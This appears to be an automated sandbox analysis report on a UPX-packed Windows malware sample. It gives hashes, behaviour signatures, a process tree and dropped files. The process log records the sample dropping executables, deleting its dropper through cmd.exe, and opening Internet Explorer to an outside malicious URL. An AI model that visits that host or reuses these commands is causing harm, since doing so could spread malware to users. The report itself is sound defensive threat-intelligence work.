Overview

overview

7

Static

static

3

0f2a604013...18.exe

windows7-x64

7

0f2a604013...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/06/2024, 18:57

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe

  • Size

    32KB

  • MD5

    0f2a6040138eb52c32ea1c7a17454862

  • SHA1

    debb1a7c0438271df202bc06555afbab532147b6

  • SHA256

    3d9f59b08a6af5df84c7bb8065e2f69f8f4370d60965fb207e58b96380f3b5bd

  • SHA512

    521523317ea028d0c1b95fb6020ac26f01ce8a177553975333864c6912340cbb4af4814a0638054a0882412958b18245e594e5ca35e7b23855d3314727847c0b

  • SSDEEP

    384:no+ihgqylX1WJQjglgOuyLz/DgjvtNUxMvim23JZn:o+ihgpW+87nspmYzUZn

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\uy.exe
      "C:\uy.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3964
      • C:\Program Files\smss.exe
        "C:\Program Files\smss.exe"
        3⤵
        • Executes dropped EXE
        PID:4372
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c del C:\uy.exe > nul
        3⤵
          PID:5064
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\1.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3432
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://c8.uk3.in:5754/kx/xjjj.htm
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3264
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:17410 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2404

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\1.vbs
            Filesize

            81B

            MD5

            59e10676cbd207d7915de41d9f60cb40

            SHA1

            e55c4d85e6bcaa1f4bf4cf584da62756247cde4b

            SHA256

            1a7a6565d8d6ae42941c9220ce62ad49b610d0768adec8c533ec265aa1f54804

            SHA512

            467622a23f640e1180c29d8f589e2bcae16005435407a48ec6cb23211de6230be8429096f44bbcb8a492a84d3434d32ed334d04d8899915ef5b48f5f82626da8

            Download Submit

          • C:\Program Files\smss.exe
            Filesize

            15.7MB

            MD5

            0b4627e947d465edfd3e686c4fc2d116

            SHA1

            75fee08a75667ce543b167b106b21b024ac43d14

            SHA256

            9af41a5836c04423914cbcacba202b09adf1c223cf5d9c61b390426df967cb10

            SHA512

            bb6820ee04e6bf31f17edf256c8d8ac9e6901abff0aa3db2fabeda79ad4e5f2daced982e69392bdc398cd8cf7bf32cfcb01a6bbab21384bf569feb8bcfc0984d

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
            Filesize

            471B

            MD5

            b9b9f42ce6d2b20bf169d05480d239d4

            SHA1

            32b094cc2ff79f07fcd68d585846b919bc350e4d

            SHA256

            4d16bb8c9a34d4de9d39bb5f0e87095617b5ad551112db17b38b6cb752fbdae4

            SHA512

            36b45c544439c6b1fab4c2fa58712475a65ad467e3da61086c4a953d6587d35f5c6ae7de740863295ae0d3534cbf67d0bed6843d95b6786b50431bfeebcf1010

            Download Submit

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
            Filesize

            404B

            MD5

            1332d982752e52da0bc750c924c53714

            SHA1

            194afefb422afb91ac8dcd76d77da4a5789c5710

            SHA256

            7fbc275e4f3b4809fe9c9ceba02bc3913f6443cde7ed760c58c258dae6b56edc

            SHA512

            bb15194cfdb767d0be30ae5b16cdfcca15566fdb9a9e4bf57577b5af401b5d68079bb702d28e13be22ba219e71acceb0874645374d31237ada252bdc43b5ced9

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verB2B6.tmp
            Filesize

            15KB

            MD5

            1a545d0052b581fbb2ab4c52133846bc

            SHA1

            62f3266a9b9925cd6d98658b92adec673cbe3dd3

            SHA256

            557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

            SHA512

            bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\E9YVC3IR\suggestions[1].en-US
            Filesize

            17KB

            MD5

            5a34cb996293fde2cb7a4ac89587393a

            SHA1

            3c96c993500690d1a77873cd62bc639b3a10653f

            SHA256

            c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

            SHA512

            e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

            Download Submit

          • C:\uy.exe
            Filesize

            8KB

            MD5

            1218963b79998af07ee81223fdbbb62f

            SHA1

            c1fd5faf23073495137e5d2ffbd54f50fbcbccd6

            SHA256

            faae720cec9a0637b6cf702b2a99161c2a128856475dfacb3f02b5b80ddc01d1

            SHA512

            212106360434b39adc857891121cc8efc8951b2874147471b910c36d156fb4d9acac2af77606eb2688670d294bcf4b19677c3a431867fb370951cc893879d637

            Download Submit

          • memory/3964-16-0x0000000000400000-0x000000000040B000-memory.dmp

            Filesize

            44KB

            Download

          • memory/3964-26-0x0000000000400000-0x000000000040B000-memory.dmp

            Filesize

            44KB

            Download

          • memory/4372-27-0x0000000000400000-0x000000000040B000-memory.dmp

            Filesize

            44KB

            Download